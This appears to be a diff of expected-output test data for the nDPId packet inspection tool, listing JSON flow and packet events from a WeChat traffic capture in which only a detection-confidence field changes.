+00729{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1418,"source":"wechat.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167851002,"flow_last_seen":1492167851002,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1492167851002,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"iphonedimonica","fingerprint":"1,121,3,6,15,119,252","class_ident":""}} 00545{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1419,"source":"wechat.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167851203,"flow_last_seen":1492167851203,"flow_idle_time":140000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1492167851203,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ff86:6c5b","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1419,"source":"wechat.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1492167851203,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1492167851203,"pkt":"MzP\/hmxbuHgu4toHht1gAAAAACA6\/wAAAAAAAAAAAAAAAAAAAAD\/AgAAAAAAAAAAAAH\/hmxbhwDa5wAAAAD+gAAAAAAAAAhCo\/OihmxbDgE+iVJ12j4="} -00606{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1419,"source":"wechat.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167851203,"flow_last_seen":1492167851203,"flow_idle_time":140000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1492167851203,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ff86:6c5b","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00606{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1419,"source":"wechat.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167851203,"flow_last_seen":1492167851203,"flow_idle_time":140000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1492167851203,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ff86:6c5b","l4_proto":"icmp6","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1420,"source":"wechat.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":2,"flow_last_seen":1492167851204,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":62,"pkt_l4_len":8,"thread_ts_msec":1492167851204,"pkt":"MzMAAAACuHgu4toHht1gCL93AAg6\/\/6AAAAAAAAACEKj86KGbFv\/AgAAAAAAAAAAAAAAAAAChQDCHwAAAAA="} 00558{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1421,"source":"wechat.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167852023,"flow_last_seen":1492167852023,"flow_idle_time":140000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1492167852023,"l3_proto":"ip6","src_ip":"fe80::842:a3f3:a286:6c5b","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 00532{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1421,"source":"wechat.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1492167852023,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":110,"pkt_l4_len":48,"thread_ts_msec":1492167852023,"pkt":"MzMAAAAWuHgu4toHht1gAAAAADgAAf6AAAAAAAAACEKj86KGbFv\/AgAAAAAAAAAAAAAAAAAWOgABAAUCAACPAPHlAAAAAgQAAAD\/AgAAAAAAAAAAAAL\/tFRbBAAAAP8CAAAAAAAAAAAAAf+GbFs="} -00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1421,"source":"wechat.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167852023,"flow_last_seen":1492167852023,"flow_idle_time":140000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1492167852023,"l3_proto":"ip6","src_ip":"fe80::842:a3f3:a286:6c5b","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} -00810{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1422,"source":"wechat.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167669545,"flow_last_seen":1492167848542,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":413,"flow_avg_l4_payload_len":206,"midstream":0,"thread_ts_msec":1492167852023,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1421,"source":"wechat.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167852023,"flow_last_seen":1492167852023,"flow_idle_time":140000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1492167852023,"l3_proto":"ip6","src_ip":"fe80::842:a3f3:a286:6c5b","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00810{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1422,"source":"wechat.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167669545,"flow_last_seen":1492167848542,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":413,"flow_avg_l4_payload_len":206,"midstream":0,"thread_ts_msec":1492167852023,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1426,"source":"wechat.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167865975,"flow_last_seen":1492167865975,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167865975,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58040,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1426,"source":"wechat.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1492167865975,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167865975,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8cVZAAEAGp93AqAFny82Tq+K4AbvAQN+1AAAAAKACchCA5wAAAgQFtAQCCAoAMq7jAAAAAAEDAwc="} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1427,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167866226,"flow_last_seen":1492167866226,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167866226,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58041,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1427,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1492167866226,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167866226,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8hOdAAEAGlEzAqAFny82Tq+K5AbuucSvFAAAAAKACchBGZwAAAgQFtAQCCAoAMq8iAAAAAAEDAwc="} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1428,"source":"wechat.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":2,"flow_last_seen":1492167866243,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167866243,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC8GKZTLzZOrwKgBZwG74rhfZ1wawEDftqASN8iGUwAAAgQFoAQCCApFrzOuADKu4wEDAwc="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1429,"source":"wechat.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":3,"flow_last_seen":1492167866243,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167866243,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0cVdAAEAGp+TAqAFny82Tq+K4AbvAQN+2X2dcG4AQAOXrqwAAAQEICgAyryZFrzOu"} -00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1430,"source":"wechat.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167865975,"flow_last_seen":1492167866243,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167866243,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58040,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1430,"source":"wechat.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167865975,"flow_last_seen":1492167866243,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167866243,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58040,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1431,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1492167866495,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167866495,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC8GKZTLzZOrwKgBZwG74rl6NAw+rnErxqASN8iAowAAAgQFoAQCCApFrzPtADKvIgEDAwc="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1432,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":3,"flow_last_seen":1492167866495,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167866495,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0hOhAAEAGlFPAqAFny82Tq+K5AbuucSvGejQMP4AQAOXl+wAAAQEICgAyr2VFrzPt"} -00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1434,"source":"wechat.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167865975,"flow_last_seen":1492167866514,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167866514,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58040,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1436,"source":"wechat.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167865975,"flow_last_seen":1492167866514,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167866514,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58040,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} -00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1478,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167866226,"flow_last_seen":1492167871050,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1492167871050,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58041,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1484,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167866226,"flow_last_seen":1492167871323,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":208,"midstream":0,"thread_ts_msec":1492167871323,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58041,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01436{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1486,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167866226,"flow_last_seen":1492167871323,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1492167871323,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58041,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} -00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1497,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1492167720101,"flow_last_seen":1492167748133,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2856,"flow_tot_l4_payload_len":27649,"flow_avg_l4_payload_len":552,"midstream":0,"thread_ts_msec":1492167872304,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54119,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1497,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1492167720353,"flow_last_seen":1492167748129,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":196,"midstream":0,"thread_ts_msec":1492167872304,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54120,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1513,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1492167765433,"flow_last_seen":1492167776953,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":9786,"flow_avg_l4_payload_len":376,"midstream":0,"thread_ts_msec":1492167897092,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1434,"source":"wechat.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167865975,"flow_last_seen":1492167866514,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167866514,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58040,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1436,"source":"wechat.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167865975,"flow_last_seen":1492167866514,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167866514,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58040,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1478,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167866226,"flow_last_seen":1492167871050,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1492167871050,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58041,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1484,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167866226,"flow_last_seen":1492167871323,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":208,"midstream":0,"thread_ts_msec":1492167871323,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58041,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01436{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1486,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167866226,"flow_last_seen":1492167871323,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1492167871323,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58041,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 